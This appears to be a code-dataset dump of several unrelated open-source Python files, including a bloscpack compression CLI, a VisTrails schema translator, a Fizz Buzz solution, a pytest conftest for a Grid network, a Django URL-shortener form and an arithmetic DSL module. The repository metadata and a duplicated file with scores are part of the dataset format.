bloscpack/cli.py | sachk/bloscpack | 87 | 6632507 | <filename>bloscpack/cli.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim :set ft=py:
import argparse
from os import path
import json
import pprint
import blosc
from .args import (BloscArgs,
BloscpackArgs,
MetadataArgs,
)
from .append import (append,
_seek_to_metadata,
_rewrite_metadata_fp
)
from .checksums import (CHECKSUMS_AVAIL,
)
from .constants import (SUFFIXES,
CNAME_AVAIL,
EXTENSION,
MIN_CLEVEL,
MAX_CLEVEL,
)
from .defaults import (DEFAULT_TYPESIZE,
DEFAULT_CLEVEL,
DEFAULT_SHUFFLE,
DEFAULT_CNAME,
DEFAULT_CHUNK_SIZE,
DEFAULT_CHECKSUM,
DEFAULT_OFFSETS,
)
from .exceptions import (FileNotFound,
ChunkingException,
FormatVersionMismatch,
ChecksumMismatch,
)
from .file_io import (pack_file_to_file,
unpack_file_from_file,
_read_beginning,
_read_compressed_chunk_fp,
)
from .headers import (decode_blosc_flags,
)
from .pretty import (reverse_pretty,
join_with_eol,
)
from .version import __version__
from . import log
def check_files(in_file, out_file, args):
""" Check files exist/don't exist.
Parameters
----------
in_file : str:
the input file
out_file : str
the output file
args : parser args
any additional arguments from the parser
Raises
------
FileNotFound
in case any of the files isn't found.
"""
if not path.exists(in_file):
raise FileNotFound("input file '%s' does not exist!" % in_file)
if path.exists(out_file):
if not args.force:
raise FileNotFound("output file '%s' exists!" % out_file)
else:
log.verbose("overwriting existing file: '%s'" % out_file)
log.verbose("input file is: '%s'" % in_file)
log.verbose("output file is: '%s'" % out_file)
def _blosc_args_from_args(args):
return BloscArgs(typesize=args.typesize,
clevel=args.clevel,
shuffle=args.shuffle,
cname=args.cname,
)
def process_compression_args(args):
""" Extract and check the compression args after parsing by argparse.
Parameters
----------
args : argparse.Namespace
the parsed command line arguments
Returns
-------
in_file : str
the input file name
out_file : str
the out_file name
blosc_args : tuple of (int, int, bool)
typesize, clevel and shuffle
"""
in_file = args.in_file
out_file = args.out_file or in_file + EXTENSION
return in_file, out_file, _blosc_args_from_args(args)
def process_decompression_args(args):
""" Extract and check the decompression args after parsing by argparse.
Warning: may call sys.exit()
Parameters
----------
args : argparse.Namespace
the parsed command line arguments
Returns
-------
in_file : str
the input file name
out_file : str
the out_file name
"""
in_file = args.in_file
out_file = args.out_file
# remove the extension for output file
if args.no_check_extension:
if out_file is None:
log.error('--no-check-extension requires use of <out_file>')
else:
if in_file.endswith(EXTENSION):
out_file = args.out_file or in_file[:-len(EXTENSION)]
else:
log.error("input file '%s' does not end with '%s'" %
(in_file, EXTENSION))
return in_file, out_file
def process_append_args(args):
original_file = args.original_file
new_file = args.new_file
if not args.no_check_extension and not original_file.endswith(EXTENSION):
log.error("original file '%s' does not end with '%s'" %
(original_file, EXTENSION))
return original_file, new_file
def process_metadata_args(args):
if args.metadata is not None:
try:
with open(args.metadata, 'r') as metadata_file:
return json.loads(metadata_file.read().strip())
except IOError as ioe:
log.error(ioe.message)
def process_nthread_arg(args):
""" Extract and set nthreads. """
if args.nthreads != blosc.ncores:
blosc.set_nthreads(args.nthreads)
log.verbose('using %d thread%s' %
(args.nthreads, 's' if args.nthreads > 1 else ''))
def log_metadata(metadata):
log.normal("Metadata:")
log.normal(pprint.pformat(metadata, width=90))
class BloscPackCustomFormatter(argparse.HelpFormatter):
""" Custom HelpFormatter.
Basically a combination and extension of ArgumentDefaultsHelpFormatter and
RawTextHelpFormatter. Adds default values to argument help, but only if the
default is not in [None, True, False]. Also retains all whitespace as it
is.
"""
def _get_help_string(self, action):
help_ = action.help
if '%(default)' not in action.help \
and action.default not in \
[argparse.SUPPRESS, None, True, False]:
defaulting_nargs = [argparse.OPTIONAL, argparse.ZERO_OR_MORE]
if action.option_strings or action.nargs in defaulting_nargs:
help_ += ' (default: %(default)s)'
return help_
def _split_lines(self, text, width):
return text.splitlines()
def _fill_text(self, text, width, indent):
return ''.join([indent + line for line in text.splitlines(True)])
def _inject_blosc_group(parser):
blosc_group = parser.add_argument_group(title='blosc settings')
blosc_group.add_argument('-t', '--typesize',
metavar='<size>',
default=DEFAULT_TYPESIZE,
type=int,
help='typesize for blosc')
blosc_group.add_argument('-l', '--clevel',
default=DEFAULT_CLEVEL,
choices=range(MIN_CLEVEL, MAX_CLEVEL+1),
metavar='[0, 9]',
type=int,
help='compression level')
blosc_group.add_argument('-s', '--no-shuffle',
action='store_false',
default=DEFAULT_SHUFFLE,
dest='shuffle',
help='deactivate shuffle')
blosc_group.add_argument('-c', '--codec',
metavar='<codec>',
type=str,
choices=CNAME_AVAIL,
default=DEFAULT_CNAME,
dest='cname',
help="codec to be used by Blosc: \n%s"
% join_with_eol(CNAME_AVAIL))
def create_parser():
""" Create and return the parser. """
parser = argparse.ArgumentParser(
#usage='%(prog)s [GLOBAL_OPTIONS] (compress | decompress)
# [COMMAND_OPTIONS] <in_file> [<out_file>]',
description='command line de/compression with blosc',
formatter_class=BloscPackCustomFormatter,
epilog="Additional help for subcommands is available:\n"+
" %(prog)s 'subcommand' [ -h | --help ]")
## print version of bloscpack, python-blosc and blosc itself
version_str = "bloscpack: '%s' " % __version__ + \
"python-blosc: '%s' " % blosc.version.__version__ + \
"blosc: '%s'" % blosc.BLOSC_VERSION_STRING
parser.add_argument('--version', action='version', version=version_str)
output_group = parser.add_mutually_exclusive_group()
output_group.add_argument('-v', '--verbose',
action='store_true',
default=False,
help='be verbose about actions')
output_group.add_argument('-d', '--debug',
action='store_true',
default=False,
help='print debugging output too')
global_group = parser.add_argument_group(title='global options')
global_group.add_argument('-f', '--force',
action='store_true',
default=False,
help='disable overwrite checks for existing files\n' +
'(use with caution)')
class CheckThreadOption(argparse.Action):
def __call__(self, parser, namespace, value, option_string=None):
if not 1 <= value <= blosc.BLOSC_MAX_THREADS:
log.error('%s must be 1 <= n <= %d'
% (option_string, blosc.BLOSC_MAX_THREADS))
setattr(namespace, self.dest, value)
global_group.add_argument('-n', '--nthreads',
metavar='[1, %d]' % blosc.BLOSC_MAX_THREADS,
action=CheckThreadOption,
default=blosc.ncores,
type=int,
dest='nthreads',
help='set number of threads, ' +
'(default: %(default)s (ncores))')
subparsers = parser.add_subparsers(title='subcommands',
metavar='',
dest='subcommand')
compress_parser = subparsers.add_parser('compress',
formatter_class=BloscPackCustomFormatter,
help='perform compression on file')
c_parser = subparsers.add_parser('c',
formatter_class=BloscPackCustomFormatter,
help="alias for 'compress'")
class CheckChunkSizeOption(argparse.Action):
def __call__(self, parser, namespace, value, option_string=None):
if value == 'max':
value = blosc.BLOSC_MAX_BUFFERSIZE
else:
try:
# try to get the value as bytes
if value[-1] in SUFFIXES.keys():
value = reverse_pretty(value)
# seems to be intended to be a naked int
else:
value = int(value)
except ValueError as ve:
log.error('%s error: %s' % (option_string, str(ve)))
if value < 0:
log.error('%s must be > 0' % option_string)
setattr(namespace, self.dest, value)
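    # Illustrative values accepted by CheckChunkSizeOption (the exact suffixes
    # are defined by bloscpack's SUFFIXES mapping, so treat these as examples):
    #   --chunk-size 1048576   plain byte count
    #   --chunk-size 1M        human-readable, suffixed size
    #   --chunk-size max       use blosc.BLOSC_MAX_BUFFERSIZE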
for p in [compress_parser, c_parser]:
_inject_blosc_group(p)
bloscpack_group = p.add_argument_group(title='bloscpack settings')
bloscpack_group.add_argument('-z', '--chunk-size',
metavar='<size>',
action=CheckChunkSizeOption,
type=str,
default=DEFAULT_CHUNK_SIZE,
dest='chunk_size',
help="set desired chunk size or 'max'")
checksum_format = join_with_eol(CHECKSUMS_AVAIL[0:3]) + \
join_with_eol(CHECKSUMS_AVAIL[3:6]) + \
join_with_eol(CHECKSUMS_AVAIL[6:])
checksum_help = 'set desired checksum:\n' + checksum_format
bloscpack_group.add_argument('-k', '--checksum',
metavar='<checksum>',
type=str,
choices=CHECKSUMS_AVAIL,
default=DEFAULT_CHECKSUM,
dest='checksum',
help=checksum_help)
bloscpack_group.add_argument('-o', '--no-offsets',
action='store_false',
default=DEFAULT_OFFSETS,
dest='offsets',
help='deactivate offsets')
bloscpack_group.add_argument('-m', '--metadata',
metavar='<metadata>',
type=str,
dest='metadata',
help="file containing the metadata, must contain valid JSON")
decompress_parser = subparsers.add_parser('decompress',
formatter_class=BloscPackCustomFormatter,
help='perform decompression on file')
d_parser = subparsers.add_parser('d',
formatter_class=BloscPackCustomFormatter,
help="alias for 'decompress'")
for p in [decompress_parser, d_parser]:
p.add_argument('-e', '--no-check-extension',
action='store_true',
default=False,
dest='no_check_extension',
help='disable checking input file for extension (*.blp)\n' +
'(requires use of <out_file>)')
for p, help_in, help_out in [(compress_parser,
'file to be compressed',
'file to compress to'),
(c_parser,
'file to be compressed',
'file to compress to'),
(decompress_parser,
'file to be decompressed',
'file to decompress to'),
(d_parser,
'file to be decompressed',
'file to decompress to'),
]:
p.add_argument('in_file',
metavar='<in_file>',
type=str,
default=None,
help=help_in)
p.add_argument('out_file',
metavar='<out_file>',
type=str,
nargs='?',
default=None,
help=help_out)
append_parser = subparsers.add_parser('append',
formatter_class=BloscPackCustomFormatter,
help='append data to a compressed file')
a_parser = subparsers.add_parser('a',
formatter_class=BloscPackCustomFormatter,
help="alias for 'append'")
for p in (append_parser, a_parser):
_inject_blosc_group(p)
p.add_argument('original_file',
metavar='<original_file>',
type=str,
help="file to append to")
p.add_argument('new_file',
metavar='<new_file>',
type=str,
help="file to append from")
p.add_argument('-e', '--no-check-extension',
action='store_true',
default=False,
dest='no_check_extension',
help='disable checking original file for extension (*.blp)\n')
p.add_argument('-m', '--metadata',
metavar='<metadata>',
type=str,
dest='metadata',
help="file containing the metadata, must contain valid JSON")
info_parser = subparsers.add_parser('info',
formatter_class=BloscPackCustomFormatter,
help='print information about a compressed file')
i_parser = subparsers.add_parser('i',
formatter_class=BloscPackCustomFormatter,
help="alias for 'info'")
for p in (info_parser, i_parser):
p.add_argument('file_',
metavar='<file>',
type=str,
default=None,
help="file to show info for")
return parser
def main():
parser = create_parser()
log.set_prefix(parser.prog)
args = parser.parse_args()
if args.verbose:
log.LEVEL = log.VERBOSE
elif args.debug:
log.LEVEL = log.DEBUG
log.debug('command line argument parsing complete')
log.debug('command line arguments are: ')
for arg, val in sorted(vars(args).items()):
log.debug(' %s: %s' % (arg, str(val)))
process_nthread_arg(args)
# compression and decompression handled via subparsers
if args.subcommand in ['compress', 'c']:
log.verbose('getting ready for compression')
in_file, out_file, blosc_args = process_compression_args(args)
try:
check_files(in_file, out_file, args)
except FileNotFound as fnf:
log.error(str(fnf))
metadata = process_metadata_args(args)
bloscpack_args = BloscpackArgs(offsets=args.offsets,
checksum=args.checksum)
try:
pack_file_to_file(in_file, out_file,
chunk_size=args.chunk_size,
metadata=metadata,
blosc_args=blosc_args,
bloscpack_args=bloscpack_args,
metadata_args=MetadataArgs())
except ChunkingException as ce:
log.error(str(ce))
elif args.subcommand in ['decompress', 'd']:
log.verbose('getting ready for decompression')
in_file, out_file = process_decompression_args(args)
try:
check_files(in_file, out_file, args)
except FileNotFound as fnf:
log.error(str(fnf))
try:
metadata = unpack_file_from_file(in_file, out_file)
if metadata:
log_metadata(metadata)
except FormatVersionMismatch as fvm:
log.error(fvm.message)
except ChecksumMismatch as csm:
log.error(csm.message)
elif args.subcommand in ['append', 'a']:
log.verbose('getting ready for append')
original_file, new_file = process_append_args(args)
try:
if not path.exists(original_file):
raise FileNotFound("original file '%s' does not exist!" %
original_file)
if not path.exists(new_file):
raise FileNotFound("new file '%s' does not exist!" %
new_file)
except FileNotFound as fnf:
log.error(str(fnf))
log.verbose("original file is: '%s'" % original_file)
log.verbose("new file is: '%s'" % new_file)
blosc_args = _blosc_args_from_args(args)
metadata = process_metadata_args(args)
append(original_file, new_file, blosc_args=blosc_args)
if metadata is not None:
with open(original_file, 'r+b') as fp:
_seek_to_metadata(fp)
_rewrite_metadata_fp(fp, metadata)
elif args.subcommand in ('info', 'i'):
try:
if not path.exists(args.file_):
raise FileNotFound("file '%s' does not exist!" %
args.file_)
except FileNotFound as fnf:
log.error(str(fnf))
try:
with open(args.file_, 'rb') as fp:
bloscpack_header, metadata, metadata_header, offsets = \
_read_beginning(fp)
checksum_impl = bloscpack_header.checksum_impl
# get the header of the first chunk
_, blosc_header, _ = _read_compressed_chunk_fp(
fp, checksum_impl)
except ValueError as ve:
log.error(str(ve) + "\n" +
"This might not be a bloscpack compressed file.")
log.normal(bloscpack_header.pformat())
if offsets:
log.normal("'offsets':")
log.normal("[%s,...]" % (",".join(str(o) for o in offsets[:5])))
if metadata is not None:
log_metadata(metadata)
log.normal(metadata_header.pformat())
log.normal("First chunk blosc header:")
log.normal(str(blosc_header))
log.normal("First chunk blosc flags: ")
log.normal(str(decode_blosc_flags(blosc_header['flags'])))
else: # pragma: no cover
# in Python 3 subcommands are not mandatory by default
parser.print_usage()
log.error('too few arguments', 2)
log.verbose('done')
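# When the package is installed, main() is normally exposed as a console-script
# entry point (e.g. ``blpk compress <file>``); the exact command name comes
# from the packaging metadata rather than from this module.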
vistrails/db/versions/v1_0_5/translate/v1_0_4.py | remram44/VisTrails-mybinder | 0 | 6632508 | ###############################################################################
##
## Copyright (C) 2014-2016, New York University.
## Copyright (C) 2011-2014, NYU-Poly.
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: <EMAIL>
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the New York University nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
from __future__ import division
from vistrails.db.versions.v1_0_5.domain import DBVistrail, DBVistrailVariable, \
DBWorkflow, DBLog, DBRegistry, \
DBAdd, DBChange, DBDelete, \
DBPortSpec, DBPortSpecItem, \
DBParameterExploration, \
DBPEParameter, DBPEFunction, \
IdScope, DBAbstraction, \
DBModule, DBGroup, DBAnnotation, \
DBActionAnnotation, DBStartup, \
DBConfigKey, DBConfigBool, DBConfigStr, \
DBConfigInt, DBConfigFloat, \
DBConfiguration, DBStartupPackage, \
DBLoopIteration, DBLoopExec, \
DBModuleExec, DBGroupExec
id_scope = None
def translateVistrail(_vistrail):
""" Translate old annotation based vistrail variables to new
DBVistrailVariable class """
global id_scope
def update_workflow(old_obj, trans_dict):
return DBWorkflow.update_version(old_obj.db_workflow,
trans_dict, DBWorkflow())
translate_dict = {'DBGroup': {'workflow': update_workflow}}
vistrail = DBVistrail()
id_scope = vistrail.idScope
vistrail = DBVistrail.update_version(_vistrail, translate_dict, vistrail)
vistrail.db_version = '1.0.5'
return vistrail
def translateWorkflow(_workflow):
global id_scope
def update_workflow(old_obj, translate_dict):
return DBWorkflow.update_version(old_obj.db_workflow, translate_dict)
translate_dict = {'DBGroup': {'workflow': update_workflow}}
workflow = DBWorkflow()
id_scope = IdScope(remap={DBAbstraction.vtType: DBModule.vtType, DBGroup.vtType: DBModule.vtType})
workflow = DBWorkflow.update_version(_workflow, translate_dict, workflow)
workflow.db_version = '1.0.5'
return workflow
def translateLog(_log):
translate_dict = {}
log = DBLog.update_version(_log, translate_dict)
log.db_version = '1.0.5'
return log
def translateRegistry(_registry):
global id_scope
translate_dict = {}
registry = DBRegistry()
id_scope = registry.idScope
registry = DBRegistry.update_version(_registry, translate_dict, registry)
registry.db_version = '1.0.5'
return registry
def translateStartup(_startup):
# format is {<old_name>: <new_name>} or
# {<old_name>: (<new_name> | None, [conversion_f | None, inner_d | None])
# conversion_f is a function that mutates the value and
# inner_d recurses the translation for inner configurations
translate_dict = {}
startup = DBStartup()
startup = DBStartup.update_version(_startup, translate_dict, startup)
startup.db_version = '1.0.5'
return startup
solutions/Elementary/Fizz Buzz/1.py | Amaimersion/CheckiO-solutions | 0 | 6632509 | #Your optional code here
#You can import some modules or create additional functions
def checkio(number):
string = ""
if (number % 3 == 0) and (number % 5 == 0):
string = "Fizz Buzz"
elif (number % 3 == 0):
string = "Fizz"
elif (number % 5 == 0):
string = "Buzz"
else:
string = str(number)
return string
#Some hints:
#Convert a number in the string with str(n)
#These "asserts" using only for self-checking and not necessary for auto-testing
if __name__ == '__main__':
assert checkio(15) == "Fizz Buzz", "15 is divisible by 3 and 5"
assert checkio(6) == "Fizz", "6 is divisible by 3"
assert checkio(5) == "Buzz", "5 is divisible by 5"
assert checkio(7) == "7", "7 is not divisible by 3 or 5"
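# For comparison only (not part of the original solution): the same rules can
# be expressed by concatenating the two words and falling back to the number.
def checkio_alt(number):
    words = ("Fizz" if number % 3 == 0 else "") \
            + (" " if number % 15 == 0 else "") \
            + ("Buzz" if number % 5 == 0 else "")
    return words or str(number)


if __name__ == '__main__':
    assert all(checkio_alt(n) == checkio(n) for n in (15, 6, 5, 7, 9, 10, 30))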
sample/openFileExample.py | luoluyao/AppetizerRemoteCall | 0 | 6632510 | import pycurl
import io
import json
jsonStr = '{"port":8099, "fileName":"plugin.xml", "line":5, "col":5, "offsetline":4}'
jsonStr1 = '{"port":8091, "fileName":"plugin.xml", "line":2, "col":0, "offsetline":4}'
jsonStr2 = '{"port":8091, "fileName":"plugin.xml", "line":2, "col":5, "offsetline":0}'
jsonStr3 = '{"port":8091, "fileName":"plugin.xml", "line":2, "col":0, "offsetline":0}'
cj = json.loads(jsonStr)
buf = io.BytesIO()  # pycurl passes bytes to the write callback, so a bytes buffer is needed
curl = pycurl.Curl()
curl.setopt(curl.URL, 'http://localhost:%s?message=%s:%d:%d:%d' % (cj['port'], cj['fileName'], cj['line'], cj['col'], cj['offsetline']))
curl.setopt(curl.WRITEFUNCTION, buf.write)
try:
curl.perform()
# todo: process return values
except pycurl.error as error:
pass
print(buf.getvalue().decode('utf-8'))
buf.close()
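# For reference, a rough 'requests'-based equivalent of the call above
# (sketch only -- the original intentionally uses pycurl):
#   import requests
#   r = requests.get('http://localhost:%s' % cj['port'],
#                    params={'message': '%s:%d:%d:%d' % (cj['fileName'], cj['line'],
#                                                        cj['col'], cj['offsetline'])})
#   print(r.text)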
test/conftest.py | Quisher/Grid | 0 | 6632511 | <reponame>Quisher/Grid
import pytest
import torch
from multiprocessing import Process
from flask_migrate import Migrate
from flask_sqlalchemy import SQLAlchemy
import os
import sys
# We need to add our rest api as a path since it is a separate application
# deployed on Heroku:
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)) + "/../app/pg_rest_api")
from pg_app import create_app
import syft
from syft import TorchHook
from test import IDS, PORTS, GATEWAY_URL, GATEWAY_PORT
import time
import requests
import json
import grid as gr
@pytest.fixture()
def start_proc(): # pragma: no cover
""" helper function for spinning up a websocket participant """
def _start_proc(participant, kwargs):
def target():
server = participant(**kwargs)
server.start()
p = Process(target=target)
p.start()
return p
return _start_proc
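# Hypothetical usage of the fixture above (the participant class and kwargs are
# illustrative -- they depend on the syft version under test):
#   proc = start_proc(WebsocketServerWorker, {"hook": hook, "id": "alice",
#                                             "host": "0.0.0.0", "port": 8182})
#   ...
#   proc.terminate()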
@pytest.fixture(scope="session", autouse=True)
def node_infos():
return zip(IDS, PORTS)
@pytest.fixture(scope="session", autouse=True)
def init_gateway():
def setUpGateway(port):
os.environ["SECRET_KEY"] = "Secretkeyhere"
from gateway.app import create_app
app = create_app(debug=False)
app.run(host="0.0.0.0", port=GATEWAY_PORT)
# Init Grid Gateway
p = Process(target=setUpGateway, args=(GATEWAY_PORT,))
p.start()
time.sleep(5)
yield
p.terminate()
@pytest.fixture(scope="session", autouse=True)
def init_nodes(node_infos):
BASEDIR = os.path.dirname(os.path.dirname(__file__))
def setUpNode(port, node_id):
from app.websocket.app import create_app as ws_create_app
from app.websocket.app import socketio
db_path = "sqlite:///" + BASEDIR + "/database" + node_id + ".db"
requests.post(
GATEWAY_URL + "/join",
data=json.dumps(
{"node-id": node_id, "node-address": "http://localhost:" + port + "/"}
),
)
socketio.async_mode = "threading"
app = ws_create_app(
debug=False, tst_config={"SQLALCHEMY_DATABASE_URI": db_path}
)
socketio.run(app, host="0.0.0.0", port=port)
jobs = []
# Init Grid Nodes
for (node_id, port) in node_infos:
config = (node_id, port)
p = Process(target=setUpNode, args=(port, node_id))
p.start()
jobs.append(p)
time.sleep(5)
yield
for job in jobs:
job.terminate()
def create_websocket_client(hook, port, id):
node = gr.WebsocketGridClient(hook, "http://localhost:" + port + "/", id=id)
node.connect()
time.sleep(0.1)
return node
@pytest.fixture(scope="function")
def connected_node(hook):
nodes = {}
for (node_id, port) in zip(IDS, PORTS):
node = create_websocket_client(hook, port, node_id)
nodes[node_id] = node
yield nodes
for node in nodes:
nodes[node].disconnect()
time.sleep(0.1)
@pytest.fixture(scope="function")
def grid_network():
my_grid = gr.GridNetwork(GATEWAY_URL)
yield my_grid
my_grid.disconnect_nodes()
@pytest.fixture(scope="session", autouse=True)
def hook():
hook = TorchHook(torch)
return hook
go/go/forms.py | srct/go | 7 | 6632512 | <gh_stars>1-10
"""
go/forms.py
"""
# Python stdlib Imports
from datetime import datetime, timedelta
# Django Imports
from django.core.exceptions import ValidationError
from django.forms import (BooleanField, CharField, ChoiceField, DateTimeField,
ModelForm, RadioSelect, SlugField, Textarea,
TextInput, URLField, URLInput)
from django.utils import timezone
from django.utils.safestring import mark_safe
# App Imports
from .models import URL
class URLForm(ModelForm):
def clean_target(self):
"""
Prevent redirect loop links
"""
# get the entered target link
target = self.cleaned_data.get('target')
return target
# Custom target URL field
target = URLField(
required=True,
label='Long URL (Required)',
max_length=1000,
widget=URLInput(attrs={
'placeholder': 'https://yoursite.com/',
'class': 'urlinput form-control',
})
)
# short --------------------------------------------------------------------
def unique_short(value):
"""
Check to make sure the short url has not been used
"""
try:
# if we're able to get a URL with the same short url
URL.objects.get(short__iexact=value)
except URL.DoesNotExist as ex:
return
# then raise a ValidationError
raise ValidationError('Short URL already exists.')
# Custom short-url field with validators.
short = SlugField(
required=False,
label='Short URL (Optional)',
widget=TextInput(
attrs={
'class': 'urlinput form-control',
}
),
validators=[unique_short],
max_length=20,
min_length=3,
)
# expires ------------------------------------------------------------------
# Define some string date standards
DAY = '1 Day'
WEEK = '1 Week'
MONTH = '1 Month'
# CUSTOM = 'Custom Date'
NEVER = 'Never'
# Define a tuple of string date standards to be used as our date choices
EXPIRATION_CHOICES = (
(DAY, DAY),
(WEEK, WEEK),
(MONTH, MONTH),
(NEVER, NEVER),
# (CUSTOM, CUSTOM),
)
# Add preset expiration choices.
expires = ChoiceField(
required=True,
label='Expiration (Required)',
choices=EXPIRATION_CHOICES,
initial=NEVER,
widget=RadioSelect(attrs={'class': 'radios'}),
)
def valid_date(value):
"""
Check if the selected date is a valid date
"""
# a valid date is one that is greater than today
if value > timezone.now():
return
# raise a ValidationError if the date is invalid
else:
raise ValidationError('Date must be after today.')
def __init__(self, *args, **kwargs):
"""
On initialization of the form, crispy forms renders this layout
"""
# Grab that host info
self.host = kwargs.pop('host', None)
super(URLForm, self).__init__(*args, **kwargs)
self.target_title = 'Paste the URL you would like to shorten:'
self.short_title = 'Create a custom Go address:'
self.expires_title = 'Set when you would like your Go address to expire:'
self.action = '/newLink'
class Meta:
"""
Metadata about this ModelForm
"""
# what model this form is for
model = URL
# what attributes are included
fields = ['target']
class EditForm(URLForm):
def __init__(self, *args, **kwargs):
super(EditForm, self).__init__(*args, **kwargs)
self.target_title = 'Modify the URL you would like to shorten:'
self.short_title = 'Modify the Go address:'
self.expires_title = 'Modify the expiration date:'
if 'initial' in kwargs:
self.action = '/edit/' + kwargs['initial']['short'] | """
go/forms.py
"""
# Python stdlib Imports
from datetime import datetime, timedelta
# Django Imports
from django.core.exceptions import ValidationError
from django.forms import (BooleanField, CharField, ChoiceField, DateTimeField,
ModelForm, RadioSelect, SlugField, Textarea,
TextInput, URLField, URLInput)
from django.utils import timezone
from django.utils.safestring import mark_safe
# App Imports
from .models import URL
class URLForm(ModelForm):
def clean_target(self):
"""
Prevent redirect loop links
"""
# get the entered target link
target = self.cleaned_data.get('target')
return target
# Custom target URL field
target = URLField(
required=True,
label='Long URL (Required)',
max_length=1000,
widget=URLInput(attrs={
'placeholder': 'https://yoursite.com/',
'class': 'urlinput form-control',
})
)
# short --------------------------------------------------------------------
def unique_short(value):
"""
Check to make sure the short url has not been used
"""
try:
# if we're able to get a URL with the same short url
URL.objects.get(short__iexact=value)
except URL.DoesNotExist as ex:
return
# then raise a ValidationError
raise ValidationError('Short URL already exists.')
# Custom short-url field with validators.
short = SlugField(
required=False,
label='Short URL (Optional)',
widget=TextInput(
attrs={
'class': 'urlinput form-control',
}
),
validators=[unique_short],
max_length=20,
min_length=3,
)
# expires ------------------------------------------------------------------
# Define some string date standards
DAY = '1 Day'
WEEK = '1 Week'
MONTH = '1 Month'
# CUSTOM = 'Custom Date'
NEVER = 'Never'
# Define a tuple of string date standards to be used as our date choices
EXPIRATION_CHOICES = (
(DAY, DAY),
(WEEK, WEEK),
(MONTH, MONTH),
(NEVER, NEVER),
# (CUSTOM, CUSTOM),
)
# Add preset expiration choices.
expires = ChoiceField(
required=True,
label='Expiration (Required)',
choices=EXPIRATION_CHOICES,
initial=NEVER,
widget=RadioSelect(attrs={'class': 'radios'}),
)
def valid_date(value):
"""
Check if the selected date is a valid date
"""
# a valid date is one that is greater than today
if value > timezone.now():
return
# raise a ValidationError if the date is invalid
else:
raise ValidationError('Date must be after today.')
def __init__(self, *args, **kwargs):
"""
On initialization of the form, crispy forms renders this layout
"""
# Grab that host info
self.host = kwargs.pop('host', None)
super(URLForm, self).__init__(*args, **kwargs)
self.target_title = 'Paste the URL you would like to shorten:'
self.short_title = 'Create a custom Go address:'
self.expires_title = 'Set when you would like your Go address to expire:'
self.action = '/newLink'
class Meta:
"""
Metadata about this ModelForm
"""
# what model this form is for
model = URL
# what attributes are included
fields = ['target']
class EditForm(URLForm):
def __init__(self, *args, **kwargs):
super(EditForm, self).__init__(*args, **kwargs)
self.target_title = 'Modify the URL you would like to shorten:'
self.short_title = 'Modify the Go address:'
self.expires_title = 'Modify the expiration date:'
if 'initial' in kwargs:
self.action = '/edit/' + kwargs['initial']['short'] | en | 0.742338 | go/forms.py # Python stdlib Imports # Django Imports # App Imports Prevent redirect loop links # get the entered target link # Custom target URL field # short -------------------------------------------------------------------- Check to make sure the short url has not been used # if we're able to get a URL with the same short url # then raise a ValidationError # Custom short-url field with validators. # expires ------------------------------------------------------------------ # Define some string date standards # CUSTOM = 'Custom Date' # Define a tuple of string date standards to be used as our date choices # (CUSTOM, CUSTOM), # Add preset expiration choices. Check if the selected date is a valid date # a valid date is one that is greater than today # raise a ValidationError if the date is invalid On initialization of the form, crispy forms renders this layout # Grab that host info Metadata about this ModelForm # what model this form is for # what attributes are included | 2.476459 | 2 |
crossbeam/dsl/arithmetic_operations.py | ellisk42/xlambda | 12 | 6632513 | <filename>crossbeam/dsl/arithmetic_operations.py
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Operations for the integer arithmetic DSL."""
from crossbeam.dsl import operation_base
class AddOperation(operation_base.OperationBase):
"""An operation that adds 2 numbers."""
def __init__(self):
super(AddOperation, self).__init__('AddOperation', 2)
def apply_single(self, raw_args):
"""See base class."""
left, right = raw_args
return left + right
def tokenized_expression(self, arg_values):
"""See base class."""
left, right = arg_values
return (['('] + left.tokenized_expression() + [' + ']
+ right.tokenized_expression() + [')'])
class SubtractOperation(operation_base.OperationBase):
"""An operation that subtracts 2 numbers."""
def __init__(self):
super(SubtractOperation, self).__init__('SubtractOperation', 2)
def apply_single(self, raw_args):
"""See base class."""
left, right = raw_args
return left - right
def tokenized_expression(self, arg_values):
"""See base class."""
left, right = arg_values
return (['('] + left.tokenized_expression() + [' - ']
+ right.tokenized_expression() + [')'])
class MultiplyOperation(operation_base.OperationBase):
"""An operation that multiplies 2 numbers."""
def __init__(self):
super(MultiplyOperation, self).__init__('MultiplyOperation', 2)
def apply_single(self, raw_args):
"""See base class."""
left, right = raw_args
return left * right
def tokenized_expression(self, arg_values):
"""See base class."""
left, right = arg_values
return (['('] + left.tokenized_expression() + [' * ']
+ right.tokenized_expression() + [')'])
class IntDivideOperation(operation_base.OperationBase):
"""An operation that divides 2 integers."""
def __init__(self):
super(IntDivideOperation, self).__init__('IntDivideOperation', 2)
